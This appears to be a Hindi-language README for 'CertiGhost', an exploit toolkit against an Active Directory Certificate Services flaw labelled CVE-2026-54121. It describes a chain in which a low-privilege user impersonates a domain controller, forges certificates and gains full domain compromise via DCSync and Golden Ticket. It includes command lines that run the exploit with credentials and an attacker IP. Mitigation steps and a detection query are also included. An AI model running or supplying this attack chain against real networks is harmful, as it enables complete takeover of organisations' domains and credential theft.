
AD CS CVE-2026-54121 के लिए एक्सप्लॉइट टूलकिट: कम-विशेषाधिकार वाले डोमेन उपयोगकर्ता डोमेन कंट्रोलर का रूप धारण करते हैं, प्रमाणपत्र जाली बनाते हैं, और DCSync/Golden Ticket के माध्यम से डोमेन से समझौता कर लेते हैं।
CertiGhost एक गंभीर भेद्यता (CVSS 8.8) है जो Active Directory Certificate Services (AD CS) में पाई जाती है, जो कम-विशेषाधिकार वाले डोमेन उपयोगकर्ता को Domain Controller का रूप धारण करने और पूर्ण डोमेन समझौता करने की अनुमति देती है।
AD CS "चेज़" फ़ॉलबैक तंत्र एक अनुरोधकर्ता को प्रमाणपत्र अनुरोध में cdc (Client DC) और rmd (Remote Domain) विशेषताएँ प्रदान करने की अनुमति देता है। CA यह सत्यापित किए बिना कि यह एक वैध Domain Controller है, पहचान डेटा को हल करने के लिए cdc लक्ष्य का अनुसरण करता है।
आक्रमण श्रृंखला:
ms-DS-MachineAccountQuota के माध्यम से)cdc के साथ हमलावर होस्ट की ओर इंगित करते हुए प्रस्तुत किया जाता हैkrbtgt हैश → Golden Ticket → पूर्ण डोमेन समझौता| दस्तावेज़ | सामग्री |
|---|---|
| USAGE.md | चरण-दर-चरण निर्देशों के साथ विस्तृत उपयोग मार्गदर्शिका |
| DIAGRAM.md | संरचना आरेख और आक्रमण प्रवाह विज़ुअलाइज़ेशन |
Stage 1 Stage 2 Stage 3 Stage 4 Stage 5 Stage 6
LDAP Disc. → Machine Acct → Rogue Svc → Cert Request → PKINIT Auth → DCSync
│ │ │ │ │ │
▼ ▼ ▼ ▼ ▼ ▼
Find DC/CA SAMR create LDAP :389 cdc+rmd attr TGT as DC01$ krbtgt hash
+ SID/DN DESKTOP-XX$ SMB :445 → CA chases → KDC accepts → Golden
+ SPNs relay attacker host cert as DC Ticket
पूर्ण आर्किटेक्चर आरेखों के लिए DIAGRAM.md देखें।
pip install -r requirements.txt
# बिना प्रमाणीकरण के स्कैन
python ad_detect.py
# प्रमाणीकृत स्कैन (अनुशंसित)
python ad_detect.py -u DOMAIN\\username -p 'Password123'
# विशिष्ट DC के साथ
python ad_detect.py -u DOMAIN\\user -p 'pass' --dc-ip 10.x.x.x
python certighost_test.py -d example.com --detect
python certighost_test.py -d example.com -u lowpriv_user -p 'Password123' --detect
python certighost_test.py -d example.com -u lowpriv_user -p 'Password123' \
--dc-ip 10.0.0.10 --attacker-ip 10.0.0.99 --exploit
ms-DS-MachineAccountQuota मानEDITF_ENABLECHASECLIENTDC फ़्लैगms-DS-MachineAccountQuota > 0 (डिफ़ॉल्ट: 10)# सभी CA सर्वरों पर जुलाई 2026 सुरक्षा अद्यतन लागू करें
# अस्थायी शमन - चेज़ फ़ॉलबैक अक्षम करें
certutil -setreg policy\EditFlags -EDITF_ENABLECHASECLIENTDC
Restart-Service CertSvc -Force
ms-DS-MachineAccountQuota को 0 पर सेट करेंENROLLEE_SUPPLIES_SUBJECT हटाएँcdc/rmd विशेषताओं वाले प्रमाणपत्र अनुरोधों की निगरानी करेंMicrosoft Threat Protection ब्लॉग के अनुसार, निम्नलिखित advanced hunting क्वेरी तैनात करें:
// Detect CertiGhost certificate requests with cdc/rmd attributes
let CertSvcEvents = DeviceEvents
| where ActionType == "CertSvcRequestSubmitted"
| extend RequestAttributes = parse_json(AdditionalFields).RequestAttributes
| where RequestAttributes has "cdc" or RequestAttributes has "rmd";
CertSvcEvents
| project Timestamp, DeviceName, InitiatingProcessAccountName, RequestAttributes
| फ़ाइल | उद्देश्य |
|---|
certighost_exploit.py | पूर्ण शोषण श्रृंखला कार्यान्वयन |
certighost_test.py | CLI के साथ पहचान + शोषण टूलकिट |
ad_detect.py | त्वरित लक्षित पहचान स्कैन |
test_exploit.py | सभी शोषण घटकों के लिए यूनिट परीक्षण (55 परीक्षण) |
requirements.txt | Python निर्भरताएँ |